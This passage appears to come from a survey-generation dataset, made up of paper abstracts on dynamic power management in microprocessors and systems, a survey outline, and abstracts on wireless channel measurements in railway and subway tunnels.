where transition times between power states are not geometrically distributed. --- paper_title: Power considerations in the design of the Alpha 21264 microprocessor paper_content: Power dissipation is rapidly becoming a limiting factor in high performance microprocessor design due to ever increasing device counts and clock rates. The 21264 is a third generation Alpha microprocessor implementation, containing 15.2 million transistors and operating at 600 MHz. This paper describes some of the techniques the Alpha design team utilized to help manage power dissipation. In addition, the electrical design of the power, ground, and clock networks is presented. --- paper_title: PowerPC 603, a microprocessor for portable computers paper_content: The PowerPC 603 incorporates a variety of features to reduce power dissipation: dynamic idle-time shutdown of separate execution units, low-power cache design, and power considerations for standard cells, data-path elements, and clocking. System-level features include three software-programmable static power management modes and a hardware-programmable phase-lock loop. Operating at 80 MHz, the 603 typically dissipates 2.2 W, while achieving an estimated 75 Specint92 and 85 Specfp92. > --- paper_title: Gated clock routing minimizing the switched capacitance paper_content: This paper presents a zero-skew gated clock routing technique for VLSI circuits. 
The gated clock tree has masking gates at the internal nodes of the clock tree, which are selectively turned on and off by the gate control signals during the active and idle times of the circuit modules to reduce switched capacitance of the clock tree. This work extends our previous work so as to account for the switched capacitance and the area of the gate control signal routing. Various tradeoffs between power and area for different design options and module activities are discussed and detailed experimental results are presented. --- paper_title: Reducing switching activity on datapath buses with control-signal gating paper_content: This paper presents a technique for saving power dissipation in large datapaths by reducing unnecessary switching activity on buses. The focus of the technique is on achieving effective power savings with minimal overhead. When a bus is not going to be used in a datapath, it is held in a quiescent state by stopping the propagation of switching activity through the module(s) driving the bus. The "observability don't-care condition" of a bus is defined to detect unnecessary switching activity on the bus. This condition is used to gate control signals going to the bus-driver modules so that switching activity on the module inputs does not propagate to the bus. A methodology for automatically synthesizing gated control signals from the register transfer level description of a design is presented. The technique has very low area, delay, power, and designer effort overhead. It was applied to one of the integer execution units of a 64-bit, two-way superscalar RISC microprocessor. Experimental results from running various application programs on the microprocessor show an average of 26.6% reduction in dynamic switching power in the execution unit, with no increase in critical path delay and negligible area overhead. --- paper_title: Precomputation-based sequential logic optimization for low power paper_content: We address the problem of optimizing logic-level sequential circuits for low power. We present a powerful sequential logic optimization method that is based on selectively precomputing the output logic values of the circuit one clock cycle before they are required, and using the precomputed values to reduce internal switching activity in the succeeding clock cycle. We present two different precomputation architectures which exploit this observation. ::: We present an automatic method of synthesizing precomputational logic so as to achieve maximal reductions in power dissipation. We present experimental results on various sequential circuits. Up to 75% reductions in average switching activity and power dissipation are possible with marginal increases in circuit area and delay. --- paper_title: Adaptive hard disk power management on personal computers paper_content: Dynamic power management can be effective for designing low-power systems. In many systems, requests are clustered into sessions. This paper proposes an adaptive algorithm that can predict session lengths and shut down components between sessions to save power. Compared to other approaches, simulations show that this algorithm can reduce power consumption in hard disks with less impact on performance or reliability. --- paper_title: Design methodology of ultra low-power MPEG4 codec core exploiting voltage scaling techniques paper_content: This paper describes a fully automated low-power design methodology in which three different voltage-scaling techniques are combined together. 
Supply voltage is scaled globally, selectively, and adaptively while keeping the performance. This methodology enabled us to design an MPEG4 codec core with 58% less power than the original in three week turn-around-time. --- paper_title: A low-voltage CMOS DC-DC converter for a portable battery-operated system paper_content: Motivated by emerging battery-operated applications that demand compact, lightweight, and highly efficient DC-DC power converters, a buck circuit is presented in which all active devices are integrated on a single chip using a standard 1.2 /spl mu/ CMOS process. The circuit delivers 750 mW at 1.5 V from a 6 V battery. To effectively eliminate switching loss at high operating frequencies, the power transistors achieve nearly ideal zero-voltage switching (ZVS) through an adjustable dead-time control scheme. The silicon area and power consumption of the gate-drive buffers are reduced with a tapering factor that minimizes short-circuit current and dynamic dissipation for a given technology and application. Measured results on a prototype IC indicate that on-chip losses at full load can be kept below 8% at 1 MHz. > --- paper_title: Automated low-power technique exploiting multiple supply voltages applied to a media processor paper_content: This paper describes an automated design technique to reduce power by making use of two supply voltages. The technique consists of structure synthesis, placement, and routing. The structure synthesizer clusters the gates off the critical paths so as to supply the reduced voltage to save power. The placement and routing tool assigns either the reduced voltage or the unreduced one to each row so as to minimize the area overhead. The reduced supply, voltage is also exploited in a clock tree to reduce power. Combining these techniques together, we applied it to a media processor chip. The combined technique reduced the power by 47% in random-logic modules and by 73% in the clock tree, while keeping the performance. --- paper_title: Data driven signal processing: an approach for energy efficient computing paper_content: The computational switching activity of digital CMOS circuits can be dynamically minimized by designing algorithms that exploit signal statistics. This results in processors that have time-varying power requirements and perform computation on demand. An approach is presented to minimize the energy dissipation per data sample in variable-load DSP systems by adaptively minimizing the power supply voltage for each sample using a variable switching speed processor. In general, using buffering and filtering, the computation can be spread over multiple samples averaging the workload and lowering energy further. It is also shown that four levels of voltage quantization combined with dithering is sufficient to closely emulate arbitrary voltage levels. --- paper_title: A 300 MIPS/W RISC core processor with variable supply-voltage scheme in variable threshold-voltage CMOS paper_content: A 300 MIPS/W RISC core processor with variable supply-voltage (VS) scheme in variable threshold-voltage CMOS (VTCMOS) is presented. Performance in MIPS/W can be improved by a factor of more than two with no modification in the RISC core except for substrate contacts for the VTCMOS. From a 3.3 V external power supply the VS scheme automatically generates minimum internal supply voltages which meet the demand on its operation frequency. 
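As a concrete illustration of the predictive shutdown ideas summarized in the references above (the exponential-average idle-period predictor and the break-even timeout used by the competitive spin-down algorithms), the following minimal Python sketch combines the two rules. It is not taken from any of the cited papers, and the smoothing weight and break-even time are assumed values chosen only for illustration.

    # Illustrative sketch only; alpha and breakeven_s are assumed values.
    class SpinDownPolicy:
        def __init__(self, alpha=0.5, breakeven_s=5.0):
            self.alpha = alpha              # weight of the most recent idle period
            self.breakeven_s = breakeven_s  # c: break-even time of one spin-down
            self.predicted_idle = 0.0

        def observe_idle(self, last_idle_s):
            # Exponential average: I_new = alpha * i_last + (1 - alpha) * I_old
            self.predicted_idle = (self.alpha * last_idle_s
                                   + (1.0 - self.alpha) * self.predicted_idle)

        def timeout_s(self):
            # Spin down immediately if the predicted idle period exceeds the
            # break-even time; otherwise fall back to the 2-competitive rule of
            # waiting breakeven_s seconds before spinning down.
            return 0.0 if self.predicted_idle > self.breakeven_s else self.breakeven_s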
--- paper_title: Monitoring system activity for OS-directed dynamic power management paper_content: Most work to date on power reduction has focused at the component level, not at the system level. In this paper, we propose a framework for describing the power behavior of system-level designs. The model consists of a set of resources, an environmental workload specification, and a power management policy , which serves as the heart of the system model. We map this model to a simulation-based framework to obtain an estimate of the system's power dissipation. Accompanying this, we propose an algorithm to optimize power management policies. The optimization algorithm can be used in a tight loop with the estimation engine to derive new power-management policy algorithms for a given system-level description. We tested our approach by applying it to a real-life low-power portable design, achieving a power estimation accuracy of ∼10%, and a 23% reduction in power after policy optimization. --- paper_title: Quantitative comparison of power management algorithms paper_content: Dynamic power management saves power by shutting down idle devices. Several management algorithms have been proposed and demonstrated to be effective in certain applications. We quantitatively compare the power saving and performance impact of these algorithms on hard disks of a desktop and notebook computers. This paper has three contributions. First, we build a framework in Windows NT to implement power managers running realistic workloads and directly interacting with users. Second, we define performance degradation that reflects user perception. Finally, we compare power saving and performance of existing algorithms and analyze the difference. --- paper_title: Software controlled power management paper_content: Reducing power consumption is critical in many system designs. Dynamic power management is an effective approach to decrease power without significantly degrading performance. Power management decisions can be implemented in either hardware or software. A recent trend on personal computers is to use software to change hardware power states. This paper presents a software architecture that allows system designers to investigate power management algorithms in a systematic fashion through a template. The architecture exploits the Advanced Configuration and Power Interface (ACPI), a standard for hardware and software. We implement two algorithms for controlling the power states of a hard disk on a personal computer running Microsoft Windows. By measuring the current feeding the hard disk, we show that the algorithms can save up to 25% more energy than the Windows power manager. Our work has two major contributions: a template for software-controlled power management and experimental comparisons of management algorithms for a hard disk. --- paper_title: System-level power estimation and optimization paper_content: Most work to date on power reduction has focused at the component level, not at the system level. In this paper, we propose a framework for describing the power behavior of system-level designs. The model consists of a set of resources, an environmental workload specification, and a power management policy, which serves as the heart of the system model. We map this model to a simulation-based framework to obtain an estimate of the system's power dissipation. Accompanying this, we propose an algorithm to optimize power management policies. 
The optimization algorithm can be used in a tight loop with the estimation engine to derive new power-management policy algorithms for a given system-level description. We tested our approach by applying it to a real-life low-power portable design, achieving a power estimation accuracy of ~10%, and a 23% reduction in power after policy optimization. ---
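The policy-optimization formulations summarized above model the power-managed system as a finite-state stochastic process and search for a control policy that trades off power against performance. A hypothetical toy version of that idea, reduced to a two-state Markov decision process solved by value iteration, is sketched below; the states, costs, and probabilities are invented for illustration and do not come from the cited papers.

    # Toy two-state power-management MDP solved by value iteration.
    # All numbers are assumptions chosen only to make the example run.
    states = ["ON", "SLEEP"]
    actions = ["stay", "switch"]
    power = {"ON": 2.0, "SLEEP": 0.1}   # average power per step
    switch_penalty = 1.5                # cost of changing power state
    p_request = 0.3                     # probability of a request per step
    miss_penalty = 4.0                  # penalty if a request finds the device asleep
    gamma = 0.95                        # discount factor

    def step_cost(s, a):
        cost = power[s] + (switch_penalty if a == "switch" else 0.0)
        return cost + (p_request * miss_penalty if s == "SLEEP" else 0.0)

    def next_state(s, a):
        return s if a == "stay" else ("SLEEP" if s == "ON" else "ON")

    V = {s: 0.0 for s in states}
    for _ in range(200):  # iterate the Bellman update to (near) convergence
        V = {s: min(step_cost(s, a) + gamma * V[next_state(s, a)] for a in actions)
             for s in states}

    policy = {s: min(actions, key=lambda a: step_cost(s, a) + gamma * V[next_state(s, a)])
              for s in states}
    print(policy)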
Title: A Survey of Design Techniques for System-Level Dynamic Power Management
Section 1: Introduction
Description 1: Introduce the significance of high performance and low-power consumption in electronic circuits and system designs.
Section 2: Modeling Power-Managed Systems
Description 2: Explain how power-managed systems are modeled, focusing on the interaction between power-manageable components (PMC's) and power managers (PM's).
Section 3: Dynamic Power Management Techniques
Description 3: Discuss various techniques for controlling the power state of a system and its components, including predictive and stochastic control methods.
Section 4: Implementation of Dynamic Power Management
Description 4: Describe how different DPM schemes are implemented in circuits and systems, focusing on the infrastructure that enables complex power management policies.
Section 5: Conclusion
Description 5: Summarize the significance of DPM in reducing power consumption and the challenges involved in designing power management policies.
Channel measurements and models for high-speed train wireless communication systems in tunnel scenarios: a survey
12
--- paper_title: Cellular architecture and key technologies for 5G wireless communication networks paper_content: The fourth generation wireless communication systems have been deployed or are soon to be deployed in many countries. However, with an explosion of wireless mobile devices and services, there are still some challenges that cannot be accommodated even by 4G, such as the spectrum crisis and high energy consumption. Wireless system designers have been facing the continuously increasing demand for high data rates and mobility required by new wireless applications and therefore have started research on fifth generation wireless systems that are expected to be deployed beyond 2020. In this article, we propose a potential cellular architecture that separates indoor and outdoor scenarios, and discuss various promising technologies for 5G wireless communication systems, such as massive MIMO, energy-efficient communications, cognitive radio networks, and visible light communications. Future challenges facing these potential technologies are also discussed. --- paper_title: Measurements and Modeling of Distributed Antenna Systems in Railway Tunnels paper_content: This paper covers some of the work carried out in the planning of the global system for mobile communication for railway (GSM-R) of the tunnels on the new high-speed trains in Spain. Solutions based on distributed antenna systems have been tested by installing several 900-MHz transmitters inside and outside of a 4000-m tunnel and measuring the propagation in different conditions. The measurements have been used to model the effects of tunnel propagation, including curves, trains passing from the outside to the inside, and the effect of two trains passing inside the tunnel. All cases have been tested by comparing solutions using isofrequency and multifrequency distributed transmitters inside the tunnel. The improvements of signal-to-noise ratio and the reduction of the blocking effects of two trains passing have demonstrated the advantages of using isofrequency distributed antenna systems in tunnels. Finally, a complete propagation model combining both modal analysis and ray tracing has been applied to predict the propagation loss inside and outside these tunnels, and results have been compared with the measurements. The model has proven to be very useful for radio planning in new railway networks. --- paper_title: Radio channel measurements and analysis at 2.4/5GHz in subway tunnels paper_content: There is an increasing demand on wireless communications in subway tunnels to provide video surveillance and sensory data for security, maintenance and train control, and to offer various communication or entertainment services (e.g., Internet, etc.) to passengers as well. The wireless channel in tunnels is quite unique due to the confined space and the waveguide effects. Therefore, modeling the radio channel characteristics in tunnels is critically important for communication systems design or optimization. This paper investigates the key radio channel characteristics of a subway tunnel at 2.4 GHz and 5 GHz, such as the path loss, root mean square (RMS) delay spread, channel stationarity, Doppler shift, and channel capacity. The field measurements show that channel characteristics in tunnels are highly location-dependent and there exist abundant components in Doppler shift domain. In the straight section of the subway tunnel, the measured path loss exponents are close to 1.6, lower than that in free space. 
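Several of the measurement papers above report tunnel path loss exponents, for example values close to 1.6 in the straight section of a subway tunnel, below the free-space value of 2. Such exponents are normally read through the standard log-distance model; the expression below is that generic textbook form, quoted here only as context for the reported exponents (the cited papers state the exponents, not this exact parameterization):

    $PL(d) = PL(d_0) + 10\,n\,\log_{10}\!\left(d/d_0\right) + X_{\sigma}$,

where $n$ is the path loss exponent, $d_0$ a reference distance, and $X_{\sigma}$ a zero-mean log-normal shadow-fading term.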
--- paper_title: Investigation on MIMO channels in subway tunnels paper_content: The purpose of this paper is to examine the possibilities of increasing the channel capacity in tunnels, and particularly in railway tunnels, due to the use of multiple-input-multiple-output techniques. Many measurement campaigns have been carried out, considering the complicated geometric structure of these tunnels. We determine the channel characteristics by making a statistical analysis of correlation matrices between antennas and singular values of the channel transfer matrix. A comparison between the theoretical and experimental results is also presented. A stochastic channel model is then proposed and validated. --- paper_title: Wideband radio channel measurements for train tunnels paper_content: We present and analyse the results of wideband radio channel measurements performed in tunnels. Both a high speed train tunnel and a smaller test tunnel have been investigated with both antennas and leaky feeders as fixed radiators. The results show typical features of the tunnel radio channel with typically low delay spread combined to significant slow fading of the LOS signal due to interferences. The delay spread may increase substantially during the fading dips. --- paper_title: Wideband analysis of large scale and small scale fading in tunnels paper_content: In this contribution, the analysis and the modeling of the large scale and small scale fading statistics in a semicircular tunnel is presented. The results are based on experimental data obtained during an extensive measurement campaign in the 2.8 - 5 GHz frequency range. Lastly, a simple model to characterize the statistics of the received signal in tunnels is presented. --- paper_title: An Empirical Random-Cluster Model for Subway Channels Based on Passive Measurements in UMTS paper_content: Recently, a measurement campaign for characterizing the channels in underground subway environments was conducted in Shanghai, China. Downlink signals transmitted by 46 universal mobile telecommunication system cells deployed along a 34-km-long subway were collected. Channel impulse responses are extracted from the data received in the common pilot channels, based on which parameters of multipath components are estimated by using a high-resolution parameter algorithm derived using the space-alternating generalized expectation-maximization principle. Multiple time-evolving clusters are obtained, each representing the channel from a remote-radio-unit of a base station to the receiver. Based on a total of 98 time-evolving clusters, channels observed in the station scenario and the tunnel scenario are modeled separately for their distinctive behaviors in many aspects, particularly in the variations of clusters’ trajectories. Intracluster characteristics parameterized by cluster delay and Doppler frequency spreads, $K$ -factor, and dependences among these parameters are investigated. Intercluster parameters, including coexisting cluster number, delay offset, power offset, and cross correlations, are investigated for the station scenario. A path loss model is established for the tunnel scenario. --- paper_title: Characterization of Angular Spread in Underground Tunnels Based on the Multimode Waveguide Model paper_content: One of the biggest challenges facing wireless designers is determining how to configure multiple-input–multiple-output (MIMO) antennas in underground-environments, such as mines, so that they deliver best performance. 
Here, we showed that angular dispersion of the signal, a phenomenon that greatly impacts channel capacity, can be accurately predicted in both the near-field and far-field of underground tunnels using a multimode waveguide model. Not only is this analytical model much faster than other methods, but it also avoids other shortcomings of measurement-based modeling (e.g., poor resolution for far distances in the tunnel). Further, we characterized the angular spread for different tunnel sizes and showed that the power azimuth spectrum can be modeled by a zero-mean Gaussian distribution whose standard deviation (the angular spread) depends on the tunnel dimension and the transmitter-receiver distance. The angular spread is found to be a decreasing function of axial distance. After a certain distance, it becomes very small (about $4^{\circ}$) and independent of the tunnel transverse dimension. Our results are useful for the design of MIMO systems in underground tunnels and sufficient to obtain the correlation matrix required to extend the IEEE 802.11n MIMO channel model to underground environments. --- paper_title: Effect of Antenna Position and Polarization on UWB Propagation Channel in Underground Mines and Tunnels paper_content: Radio propagation in confined spaces is consequent upon reflections by the boundaries. In such cases, the relative position and polarization of antennas become important. This paper investigates the effect of antenna position and polarization on ultra-wideband radio propagation in underground mines and tunnels. Analysis is based on channel measurements, over the 2.4 to 4 GHz frequency band, in three tunnels of varying cross-sectional dimensions and lengths. Effects of mounting antennas on the ceiling versus the walls and horizontal versus vertical polarization are compared in terms of path loss and time dispersion. Results show that average path loss is more sensitive to antenna position and polarization than is time dispersion. The effect of polarization is found to be dependent upon antenna position. Horizontal polarization results in less average path loss when the antennas are mounted close to the ceiling, whereas vertical polarization results in less average loss when mounted close to a side wall. It is demonstrated that carefully considering antenna position and polarization can result in more efficient and cost-effective deployment of UWB systems in underground environments. --- paper_title: Broadband radio communications in subway stations and tunnels paper_content: Broadband radio communication systems are very important for railway traffic control systems and passenger network services. Nowadays, even though 4G LTE (Long Term Evolution) has been deployed for commercial use with excellent results in open areas, there is still a lack of knowledge regarding how such broadband signals propagate inside complex environments, such as subway tunnels and stations, that contain many structures affecting propagation. For this reason, the aim of the measurements presented in this paper is to model the response of the broadband channel at 1000 MHz and 2450 MHz in subway environments. These measurements focus on three types of scenarios: subway stations, straight tunnels, and the effect of a passing train on the signal.
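For the multimode-waveguide angular-spread result summarized a few entries above (a zero-mean Gaussian power azimuth spectrum whose standard deviation shrinks with axial distance, approaching roughly $4^{\circ}$ deep inside the tunnel), the stated model corresponds to a spectrum of the form

    $P(\theta) \propto \exp\!\left(-\dfrac{\theta^{2}}{2\,\sigma_{\theta}^{2}(d)}\right)$,

where the angular spread $\sigma_{\theta}(d)$ decreases with transmitter-receiver distance $d$ and depends on the tunnel cross-section; the explicit functional dependence of $\sigma_{\theta}$ on $d$ is given in the cited paper and is not reproduced here.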
--- paper_title: Measurement and statistical analysis of 1.89GHz radio propagation in a realistic mountain tunnel paper_content: Accurate characterization of the radio channel in tunnels is of great importance for vehicle control communication systems. To model the characteristics of this special environment, actual measurements have been carried out at 1.89 GHz in the Shidao Mountain Highway Tunnel environment. During the measurements, a base station transmitter and a mobile receiver were installed in the tunnel and on a testing car, respectively. With an optimum antenna configuration, the main propagation characteristics of a complex mountain tunnel environment, including path loss, shadow fading, fast fading, level crossing rate (LCR) and average fade duration (AFD), have been measured and computed. All analysis results have been shown in a complete table for deepening the insight into the propagation mechanism within tunnel environments. --- paper_title: Measurements of the propagation of UHF radio waves on an underground railway train paper_content: Measurements of the natural propagation of UHF radio waves on an underground train are reported. Of prime interest are the natural propagation attenuation and the median signal level behavior. The propagation attenuation rates or the median signal level behaviors are found to correlate with the train carriages and frequency. On the front carriage, the propagation attenuation rate is 54 dB/100 m at 465 MHz and reduced to 21 dB/100 m at 820 MHz. However, on the rear carriage, it becomes 14.8 dB/100 m at 465 MHz and 7.8 dB/100 m at 820 MHz. It is shown that higher frequency is beneficial to the natural propagation and the train body greatly affects the natural propagation. Furthermore, the values of the path loss exponent are also given. --- paper_title: Broadband Channel Long Delay Cluster Measurements and Analysis at 2.4GHz in Subway Tunnels paper_content: The delay caused by the reflected ray in broadband communication has a great influence on communications in subway tunnels. This paper presents measurements taken in subway tunnels at 2.4 GHz, with 5 MHz bandwidth. According to the propagation characteristics of the tunnel, the measurements were carried out with a frequency-domain channel sounding technique in three typical scenarios: line of sight (LOS), non-line-of-sight (NLOS) and far line of sight (FLOS), which lead to different delay distributions. First, an IFFT was used to obtain the channel impulse response (CIR) h(t) from the measured three-dimensional transfer functions. The power delay profile (PDP) was investigated to give an overview of the broadband channel model. Thereafter, a long delay caused by the obturation of the tunnel is observed and investigated in all the scenarios. The measurements show that reflections are largely retained by the tunnel, which leads to a long-delay cluster in which the reflected rays, rather than the direct ray, make the main contribution to radio wave propagation. Four important parameters (the distribution of the whole PDP power, the first-peak arrival time, the reflection cluster duration, and the PDP power distribution of the reflection cluster) were studied to give a detailed description of the long-delay characteristics in tunnels. This can be used to ensure high-capacity communication in tunnels.
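The delay-cluster analysis summarized above works from the power delay profile of the measured channel impulse response. A minimal sketch of that processing chain is given below; the synthetic two-path CIR is an assumption used only to make the example self-contained, not measured data from the cited campaigns.

    # Sketch: PDP, mean excess delay and RMS delay spread from a CIR.
    import numpy as np

    def delay_stats(h, dt):
        """h: complex CIR samples; dt: delay resolution in seconds."""
        pdp = np.abs(h) ** 2                 # power delay profile P(tau)
        tau = np.arange(len(h)) * dt
        p = pdp / pdp.sum()
        mean_delay = np.sum(p * tau)         # first moment (mean excess delay)
        rms = np.sqrt(np.sum(p * (tau - mean_delay) ** 2))  # RMS delay spread
        return mean_delay, rms

    # Assumed toy channel: a direct ray plus one weaker long-delay reflection.
    h = np.zeros(256, dtype=complex)
    h[0] = 1.0
    h[80] = 0.3 * np.exp(1j * 0.7)
    print(delay_stats(h, dt=50e-9))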
--- paper_title: Measurement of Distributed Antenna Systems at 2.4 GHz in a Realistic Subway Tunnel Environment paper_content: Accurate characterization of the radio channel in tunnels is of great importance for new signaling and train control communications systems. To model this environment, measurements have been taken at 2.4 GHz in a real environment in Madrid subway. The measurements were carried out with four base station transmitters installed in a 2-km tunnel and using a mobile receiver installed on a standard train. First, with an optimum antenna configuration, all the propagation characteristics of a complex subway environment, including near shadowing, path loss, shadow fading, fast fading, level crossing rate (LCR), and average fade duration (AFD), have been measured and computed. Thereafter, comparisons of propagation characteristics in a double-track tunnel (9.8-m width) and a single-track tunnel (4.8-m width) have been made. Finally, all the measurement results have been shown in a complete table for accurate statistical modeling. --- paper_title: On the Possibility of Interpreting Field Variations and Polarization in Arched Tunnels Using a Model for Propagation in Rectangular or Circular Tunnels paper_content: We investigate the possibility of using the modal theory of the electromagnetic propagation in rectangular or circular tunnels, to satisfactorily interpret experimental results, including polarization, in arched tunnels. This study is based on extensive measurement campaigns carried out in the 450 MHz-5 GHz frequency range. --- paper_title: Analysis of radio wave propagation characteristics in rectangular road tunnel at 800 MHz and 2.4 GHz paper_content: We analyze radio wave propagation characteristics in tunnel using simulations by ray-tracing method and measurements for a newly constructed tunnel in Korea. As the simulation results using direct wave and 25 reflected waves and the measurement ones against the 14.7 meters wide, and 6.15 meters high, and 365 meters long tunnel is similar to each other, the radio wave propagation model for predicting received power in the tunnel can be applied to the other tunnels. --- paper_title: Measurements and Modeling of Distributed Antenna Systems in Railway Tunnels paper_content: This paper covers some of the work carried out in the planning of the global system for mobile communication for railway (GSM-R) of the tunnels on the new high-speed trains in Spain. Solutions based on distributed antenna systems have been tested by installing several 900-MHz transmitters inside and outside of a 4000-m tunnel and measuring the propagation in different conditions. The measurements have been used to model the effects of tunnel propagation, including curves, trains passing from the outside to the inside, and the effect of two trains passing inside the tunnel. All cases have been tested by comparing solutions using isofrequency and multifrequency distributed transmitters inside the tunnel. The improvements of signal-to-noise ratio and the reduction of the blocking effects of two trains passing have demonstrated the advantages of using isofrequency distributed antenna systems in tunnels. Finally, a complete propagation model combining both modal analysis and ray tracing has been applied to predict the propagation loss inside and outside these tunnels, and results have been compared with the measurements. The model has proven to be very useful for radio planning in new railway networks. 
--- paper_title: Investigation on MIMO channels in subway tunnels paper_content: The purpose of this paper is to examine the possibilities of increasing the channel capacity in tunnels, and particularly in railway tunnels, due to the use of multiple-input-multiple-output techniques. Many measurement campaigns have been carried out, considering the complicated geometric structure of these tunnels. We determine the channel characteristics by making a statistical analysis of correlation matrices between antennas and singular values of the channel transfer matrix. A comparison between the theoretical and experimental results is also presented. A stochastic channel model is then proposed and validated. --- paper_title: Wideband analysis of large scale and small scale fading in tunnels paper_content: In this contribution, the analysis and the modeling of the large scale and small scale fading statistics in a semicircular tunnel is presented. The results are based on experimental data obtained during an extensive measurement campaign in the 2.8 - 5 GHz frequency range. Lastly, a simple model to characterize the statistics of the received signal in tunnels is presented. --- paper_title: An Empirical Random-Cluster Model for Subway Channels Based on Passive Measurements in UMTS paper_content: Recently, a measurement campaign for characterizing the channels in underground subway environments was conducted in Shanghai, China. Downlink signals transmitted by 46 universal mobile telecommunication system cells deployed along a 34-km-long subway were collected. Channel impulse responses are extracted from the data received in the common pilot channels, based on which parameters of multipath components are estimated by using a high-resolution parameter algorithm derived using the space-alternating generalized expectation-maximization principle. Multiple time-evolving clusters are obtained, each representing the channel from a remote-radio-unit of a base station to the receiver. Based on a total of 98 time-evolving clusters, channels observed in the station scenario and the tunnel scenario are modeled separately for their distinctive behaviors in many aspects, particularly in the variations of clusters’ trajectories. Intracluster characteristics parameterized by cluster delay and Doppler frequency spreads, $K$ -factor, and dependences among these parameters are investigated. Intercluster parameters, including coexisting cluster number, delay offset, power offset, and cross correlations, are investigated for the station scenario. A path loss model is established for the tunnel scenario. --- paper_title: Broadband radio communications in subway stations and tunnels paper_content: Broadband radio communication systems are very important for railway traffic control systems and passengers network services. Nowadays, even though 4G LTE (Long Term Evolution) has deployed for commercial use with excellent results in open areas, it is still lack of knowledge regarding to how such broadband signals propagate inside complex environments with many complex structures that affect propagation such as subway tunnels and stations. For this reason, the aim of the presented measurements in this paper is to model the response of the broadband channel at 1000 MHz and 2450 MHz in the subway environments. These measurements focus on three types of scenarios: subway stations, straight tunnels and a train effect the signal. 
The results provide detailed information about the propagation channel, which can be useful to develop a broadband propagation model for underground communication systems. --- paper_title: Measurement and statistical analysis of 1.89GHz radio propagation in a realistic mountain tunnel paper_content: Accurate characterization of the radio channel in tunnels is of great importance for vehicle control communications systems. For the purpose of modeling characterizations of this special environment, actual measurements have been carried out at 1.89GHz in Shidao Mountain Highway Tunnel environment. During the measurements, a base station transmitters and a mobile receiver was installed in the tunnel and on a testing car respectively. With an optimum antenna configuration, main propagation characteristics of a complex mountain tunnel environment, including path loss, shadow fading, fast fading, level crossing rate (LCR) and average fade duration (AFD), have been measured and computed. All analysis results have been shown in a complete table for deepening the insight into the propagation mechanism within tunnel environments. --- paper_title: Broadband Channel Long Delay Cluster Measurements and Analysis at 2.4GHz in Subway Tunnels paper_content: The delay caused by the reflected ray in broadband communication has a great influence on the communications in subway tunnel. This paper presents measurements taken in subway tunnels at 2.4 GHz, with 5 MHz bandwidth. According to propagation characteristics of tunnel, the measurements were carried out with a frequency domain channel sounding technique, in three typical scenarios: line of sight (LOS), Non-line-of-sight (NLOS) and far line of sight (FLOS), which lead to different delay distributions. Firstly IFFT was chosen to get channel impulse response (CIR) h(t) from measured three-dimensional transfer functions. Power delay profile (PDP) was investigated to give an overview of broadband channel model. Thereafter, a long delay caused by the obturation of tunnel is observed and investigated in all the scenarios. The measurements show that the reflection can be greatly remained by the tunnel, which leads to long delay cluster where the reflection, but direct ray, makes the main contribution for radio wave propagation. Four important parameters: distribution of whole PDP power, first peak arriving time, reflection cluster duration and PDP power distribution of reflection cluster were studied to give a detailed description of long delay characteristic in tunnel. This can be used to ensure high capacity communication in tunnels. --- paper_title: Measurement of Distributed Antenna Systems at 2.4 GHz in a Realistic Subway Tunnel Environment paper_content: Accurate characterization of the radio channel in tunnels is of great importance for new signaling and train control communications systems. To model this environment, measurements have been taken at 2.4 GHz in a real environment in Madrid subway. The measurements were carried out with four base station transmitters installed in a 2-km tunnel and using a mobile receiver installed on a standard train. First, with an optimum antenna configuration, all the propagation characteristics of a complex subway environment, including near shadowing, path loss, shadow fading, fast fading, level crossing rate (LCR), and average fade duration (AFD), have been measured and computed. 
Thereafter, comparisons of propagation characteristics in a double-track tunnel (9.8-m width) and a single-track tunnel (4.8-m width) have been made. Finally, all the measurement results have been shown in a complete table for accurate statistical modeling. --- paper_title: Four-slope channel model for path loss prediction in tunnels at 400 MHz paper_content: The present study analyses radio propagation at the 400 MHz frequency band inside road and railway tunnels. It proposes, on the basis of field measurements, a path loss model consisting of four segments, namely: the free space segment, the high path loss segment, the waveguide segment and, in the furthest region, the free space propagation segment. Free space propagation is characteristic in a region close to an antenna. In the next region, the near region, only a few reflected rays reach the receiver resulting in high path loss. Further away, in the far region, the waveguide effect occurs because of a set of waves reflected from the tunnel walls resulting in low path loss. In the extreme far region, the waveguide effect vanishes because of attenuation of reflected rays. The points separating the individual segments are analytically defined. Model applicability and accuracy are checked by calculating the mean error and standard deviation. The results indicate reasonable agreement between measurements and the model. This four-slope path loss channel model can be applied for rapid and simple coverage prediction of direct mode operation in TETRA systems. --- paper_title: Measurement Analysis and Channel Modeling for TOA-Based Ranging in Tunnels paper_content: A robust and accurate positioning solution is required to increase the safety in GPS-denied environments. Although there is a lot of available research in this area, little has been done for confined environments such as tunnels. Therefore, we organized a measurement campaign in a basement tunnel of Linkoping university, in which we obtained ultra-wideband (UWB) complex impulse responses for line-of-sight (LOS), and three non-LOS (NLOS) scenarios. This paper is focused on time-of-arrival (TOA) ranging since this technique can provide the most accurate range estimates, which are required for range-based positioning. We describe the measurement setup and procedure, select the threshold for TOA estimation, analyze the channel propagation parameters obtained from the power delay profile (PDP), and provide statistical model for ranging. According to our results, the rise-time should be used for NLOS identification, and the maximum excess delay should be used for NLOS error mitigation. However, the NLOS condition cannot be perfectly determined, so the distance likelihood has to be represented in a Gaussian mixture form. We also compared these results with measurements from a mine tunnel, and found a similar behavior. --- paper_title: Measurement and Analysis of Extra Propagation Loss of Tunnel Curve paper_content: Wave propagation experiences extra loss in curved tunnels, which is highly desired for network planning. Extensive narrow-band propagation measurements are made in two types of Madrid subway tunnels (different cross sections and curvatures) with various configurations (different frequencies and polarizations). A ray tracer validated by the straight and curved parts of the measuring tunnels is employed to simulate the reference received signal power by assuming the curved tunnel to be straight. 
